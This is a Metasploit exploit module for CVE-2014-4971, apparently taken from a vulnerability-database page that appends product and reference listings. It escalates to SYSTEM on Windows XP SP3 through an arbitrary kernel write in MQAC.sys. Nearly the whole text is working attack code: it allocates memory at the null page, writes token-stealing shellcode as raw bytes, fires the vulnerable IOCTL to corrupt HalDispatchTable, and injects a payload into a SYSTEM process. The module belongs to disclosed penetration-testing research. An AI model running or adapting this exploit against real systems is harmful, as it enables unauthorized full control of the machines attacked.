
class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
      'Description'    => %q{
        A vulnerability within the MQAC.sys module allows an attacker to overwrite
        an arbitrary location in kernel memory. This module will elevate itself to
        SYSTEM, then inject the payload into another SYSTEM process.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Matt Bergin',      # original exploit and all the hard work
        'Spencer McIntyre'  # MSF module
      ],
      'Arch'           => [ ARCH_X86 ],
      'Platform'       => [ 'win' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets'        => [
        [ 'Windows XP SP3',
          {
            '_KPROCESS' => "\x44",
            '_TOKEN'    => "\xc8",
            '_UPID'     => "\x84",
            '_APLINKS'  => "\x88"
          }
        ],
      ],
      'References'     => [
        [ 'CVE', '2014-4971' ],
        [ 'EDB', '34112' ],
        [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
      ],
      'DisclosureDate'=> 'Jul 22 2014',
      'DefaultTarget'  => 0
    }))
  end

  def find_sys_base(drvname)
    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [
      ["PBLOB", "lpImageBase", "out"],
      ["DWORD", "cb", "in"],
      ["PDWORD", "lpcbNeeded", "out"]])
    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [
      ["LPVOID", "ImageBase", "in"],
      ["PBLOB", "lpBaseName", "out"],
      ["DWORD", "nSize", "in"]])

    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")

    addresses.each do |address|
      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
      current_drvname = results['lpBaseName'][0..results['return'] - 1]
      if drvname == nil
        if current_drvname.downcase.include?('krnl')
          return [address, current_drvname]
        end
      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
        return [address, current_drvname]
      end
    end
  end

  # Function borrowed from smart_hashdump
  def get_system_proc
    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
    local_sys = resolve_sid("S-1-5-18")
    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"

    this_pid = session.sys.process.getpid

    # Processes that can Blue Screen a host if migrated in to
    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]

    session.sys.process.processes.each do |p|
      # Check we are not migrating to a process that can BSOD the host
      next if dangerous_processes.include?(p["name"])
      next if p["pid"] == this_pid
      next if p["pid"] == 4
      next if p["user"] != system_account_name
      return p
    end
  end

  def open_device
    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
    if handle['return'] == 0
      print_error('Failed to open the \\\\.\\MQAC device')
      return nil
    end
    handle = handle['return']
  end

  def check
    handle = open_device
    if handle.nil?
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)

    os = sysinfo["OS"]
    case os
    when /windows xp.*service pack 3/i
      return Exploit::CheckCode::Appears
    when /windows xp/i
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    if sysinfo["Architecture"] =~ /wow64/i
      print_error("Running against WOW64 is not supported")
      return
    elsif sysinfo["Architecture"] =~ /x64/
      print_error("Running against 64-bit systems is not supported")
      return
    end

    if is_system?
      print_error("This meterpreter session is already running as SYSTEM")
      return
    end

    kernel_info = find_sys_base(nil)
    base_addr = 0xffff
    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")

    handle = open_device
    return if handle.nil?

    this_proc = session.sys.process.open
    unless this_proc.memory.writable?(base_addr)
      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
    end
    unless this_proc.memory.writable?(base_addr)
      print_error('Failed to properly allocate memory')
      this_proc.close
      return
    end

    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
    hKernel = hKernel['return']
    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
    halDispatchTable = halDispatchTable['return']
    halDispatchTable -= hKernel
    halDispatchTable += kernel_info[0]
    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")

    tokenstealing = "\x52"                                                         # push edx                         # Save edx on the stack
    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                       | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4        | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!

    shellcode = make_nops(0x200) + tokenstealing
    this_proc.memory.write(0x1, shellcode)
    this_proc.close

    print_status("Triggering vulnerable IOCTL")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
    unless is_system?
      print_error("Exploit failed")
      return
    end

    proc = get_system_proc
    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
    unless execute_shellcode(payload.encoded, nil, proc['pid'])
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end

Products Mentioned

Configuration 0

Microsoft >> Windows_xp >> Version *

References

http://www.securitytracker.com/id/1031025
Tags: vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/68764
Tags: vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/34112
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.exploit-db.com/exploits/34131
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.exploit-db.com/exploits/34982
Tags: exploit, x_refsource_EXPLOIT-DB
http://seclists.org/fulldisclosure/2014/Jul/97
Tags: mailing-list, x_refsource_FULLDISC
http://www.osvdb.org/109387
Tags: vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/60974
Tags: third-party-advisory, x_refsource_SECUNIA
http://seclists.org/fulldisclosure/2014/Jul/96
Tags: mailing-list, x_refsource_FULLDISC